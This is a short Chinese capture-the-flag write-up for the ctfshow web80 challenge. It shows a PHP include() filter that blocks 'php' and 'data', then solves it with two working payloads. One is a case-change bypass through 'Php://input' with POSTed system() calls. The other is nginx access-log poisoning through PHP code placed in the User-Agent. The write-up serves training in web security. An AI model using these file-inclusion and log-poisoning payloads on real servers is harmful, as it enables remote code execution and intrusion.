[ctfshow web入门] web80

信息收集

过滤了phpdata

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据


日志绕过

php 复制代码
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
赵大仁12 分钟前
深入理解 Pinia:Vue 状态管理的革新与实践
前端·javascript·vue.js
小小小小宇15 分钟前
业务项目中使用自定义Webpack 插件
前端
小小小小宇42 分钟前
前端AST 节点类型
前端
小小小小宇1 小时前
业务项目中使用自定义eslint插件
前端
babicu1231 小时前
CSS Day07
java·前端·css
小小小小宇1 小时前
业务项目使用自定义babel插件
前端
前端码虫2 小时前
JS分支和循环
开发语言·前端·javascript
GISer_Jing2 小时前
MonitorSDK_性能监控(从Web Vital性能指标、PerformanceObserver API和具体代码实现)
开发语言·前端·javascript
余厌厌厌2 小时前
墨香阁小说阅读前端项目
前端
fanged2 小时前
Angularjs-Hello
前端·javascript·angular.js